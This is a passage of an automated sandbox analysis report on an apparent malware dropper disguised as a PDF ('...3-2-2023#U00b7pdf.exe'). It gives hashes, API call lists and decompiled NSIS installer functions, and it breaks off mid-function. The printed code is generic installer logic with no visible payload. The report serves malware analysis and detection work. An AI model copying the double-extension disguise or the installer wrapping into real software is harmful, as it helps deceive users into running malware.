                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Deskriptiv155\Hjertere$C:\Users\user\AppData\Local\Deskriptiv155\Hjertere$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                      • API String ID: 2488574733-726718566
                                                                      • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                                      • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                                      • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                                      • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 133 4054b0-4054cb 134 4054d1-405598 GetDlgItem * 3 call 40430b call 404c0e GetClientRect GetSystemMetrics SendMessageW * 2 133->134 135 40565a-405661 133->135 153 4055b6-4055b9 134->153 154 40559a-4055b4 SendMessageW * 2 134->154 137 405663-405685 GetDlgItem CreateThread CloseHandle 135->137 138 40568b-405698 135->138 137->138 139 4056b6-4056c0 138->139 140 40569a-4056a0 138->140 144 4056c2-4056c8 139->144 145 405716-40571a 139->145 142 4056a2-4056b1 ShowWindow * 2 call 40430b 140->142 143 4056db-4056e4 call 40433d 140->143 142->139 157 4056e9-4056ed 143->157 150 4056f0-405700 ShowWindow 144->150 151 4056ca-4056d6 call 4042af 144->151 145->143 148 40571c-405722 145->148 148->143 155 405724-405737 SendMessageW 148->155 158 405710-405711 call 4042af 150->158 159 405702-40570b call 405371 150->159 151->143 160 4055c9-4055e0 call 4042d6 153->160 161 4055bb-4055c7 SendMessageW 153->161 154->153 162 405839-40583b 155->162 163 40573d-405768 CreatePopupMenu call 406234 AppendMenuW 155->163 158->145 159->158 172 4055e2-4055f6 ShowWindow 160->172 173 405616-405637 GetDlgItem SendMessageW 160->173 161->160 162->157 170 40576a-40577a GetWindowRect 163->170 171 40577d-405792 TrackPopupMenu 163->171 170->171 171->162 174 405798-4057af 171->174 175 405605 172->175 176 4055f8-405603 ShowWindow 172->176 173->162 177 40563d-405655 SendMessageW * 2 173->177 178 4057b4-4057cf SendMessageW 174->178 179 40560b-405611 call 40430b 175->179 176->179 177->162 178->178 180 4057d1-4057f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 4057f6-40581d SendMessageW 180->182 182->182 183 40581f-405833 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->162
                                                                      C-Code - Quality: 95%
                                                                      			E004054B0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405444, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406234(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423728;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42920c == _t156) {
							ShowWindow( *0x42a248, 8);
							if( *0x42a2cc == _t156) {
								_t119 =  *0x422700; // 0x4cd37c
								E00405371( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004042AF(_t171);
							goto L25;
						}
						 *0x421ef8 = 2;
						E004042AF(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040433D(_a8, _a12, _a16);
						}
						ShowWindow( *0x429210, _t156);
						ShowWindow(_t169, 8);
						E0040430B(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a250;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429210 = GetDlgItem(_a4, 0x403);
				 *0x429208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429224 = _t134;
				_v8 = _t134;
				E0040430B( *0x429210);
				 *0x429214 = E00404C0E(4);
				 *0x42922c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D6(_a4);
				if(( *0x42a258 & 0x00000003) != 0) {
					ShowWindow( *0x429210, _t156);
					if(( *0x42a258 & 0x00000002) != 0) {
						 *0x429210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040430B( *0x429208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a258 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                      0x004054b8
                                                                      0x004054be
                                                                      0x004054c8
                                                                      0x004054cb
                                                                      0x00405661
                                                                      0x0040567e
                                                                      0x00405685
                                                                      0x00405685
                                                                      0x00405698
                                                                      0x004056b6
                                                                      0x004056b8
                                                                      0x004056c0
                                                                      0x00405716
                                                                      0x0040571a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040571c
                                                                      0x00405722
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040572c
                                                                      0x00405734
                                                                      0x00405737
                                                                      0x00405839
                                                                      0x00000000
                                                                      0x00405839
                                                                      0x00405746
                                                                      0x00405751
                                                                      0x0040575a
                                                                      0x00405765
                                                                      0x00405768
                                                                      0x00405771
                                                                      0x00405777
                                                                      0x0040577a
                                                                      0x0040577a
                                                                      0x00405792
                                                                      0x0040579b
                                                                      0x0040579e
                                                                      0x004057a5
                                                                      0x004057ac
                                                                      0x004057b4
                                                                      0x004057b4
                                                                      0x004057cb
                                                                      0x004057cb
                                                                      0x004057d2
                                                                      0x004057d8
                                                                      0x004057e4
                                                                      0x004057eb
                                                                      0x004057f4
                                                                      0x004057f6
                                                                      0x004057f9
                                                                      0x00405808
                                                                      0x0040580b
                                                                      0x00405811
                                                                      0x00405812
                                                                      0x00405818
                                                                      0x00405819
                                                                      0x0040581a
                                                                      0x00405822
                                                                      0x0040582d
                                                                      0x00405833
                                                                      0x00405833
                                                                      0x00000000
                                                                      0x00405792
                                                                      0x004056c8
                                                                      0x004056f8
                                                                      0x00405700
                                                                      0x00405702
                                                                      0x0040570b
                                                                      0x0040570b
                                                                      0x00405711
                                                                      0x00000000
                                                                      0x00405711
                                                                      0x004056cc
                                                                      0x004056d6
                                                                      0x00000000
                                                                      0x0040569a
                                                                      0x004056a0
                                                                      0x004056db
                                                                      0x00000000
                                                                      0x004056e4
                                                                      0x004056a9
                                                                      0x004056ae
                                                                      0x004056b1
                                                                      0x00000000
                                                                      0x004056b1
                                                                      0x00405698
                                                                      0x004054d1
                                                                      0x004054d5
                                                                      0x004054dd
                                                                      0x004054e1
                                                                      0x004054e4
                                                                      0x004054e7
                                                                      0x004054ea
                                                                      0x004054ed
                                                                      0x004054ee
                                                                      0x004054ef
                                                                      0x00405508
                                                                      0x0040550b
                                                                      0x00405515
                                                                      0x00405524
                                                                      0x0040552c
                                                                      0x00405534
                                                                      0x00405539
                                                                      0x0040553c
                                                                      0x00405548
                                                                      0x00405551
                                                                      0x0040555a
                                                                      0x0040557c
                                                                      0x00405582
                                                                      0x00405593
                                                                      0x00405598
                                                                      0x004055a6
                                                                      0x004055b4
                                                                      0x004055b4
                                                                      0x004055b9
                                                                      0x004055c7
                                                                      0x004055c7
                                                                      0x004055cc
                                                                      0x004055cf
                                                                      0x004055d4
                                                                      0x004055e0
                                                                      0x004055e9
                                                                      0x004055f6
                                                                      0x00405605
                                                                      0x004055f8
                                                                      0x004055fd
                                                                      0x004055fd
                                                                      0x00405611
                                                                      0x00405611
                                                                      0x00405625
                                                                      0x0040562e
                                                                      0x00405637
                                                                      0x00405647
                                                                      0x00405653
                                                                      0x00405653
                                                                      0x00000000

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                                      • GetClientRect.USER32(?,?), ref: 0040555A
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405561
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
                                                                      • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                                        • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,?,00404137), ref: 00404319
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405685
                                                                      • ShowWindow.USER32(00000000), ref: 004056A9
                                                                      • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                                      • ShowWindow.USER32(00000008), ref: 004056F8
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                                      • CreatePopupMenu.USER32 ref: 0040573D
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                                      • GetWindowRect.USER32(?,?), ref: 00405771
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                                      • OpenClipboard.USER32(00000000), ref: 004057D2
                                                                      • EmptyClipboard.USER32 ref: 004057D8
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004057EE
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
                                                                      • CloseClipboard.USER32 ref: 00405833
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: (7B${
                                                                      • API String ID: 590372296-525222780
                                                                      • Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                                      • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                                      • Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                                      • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
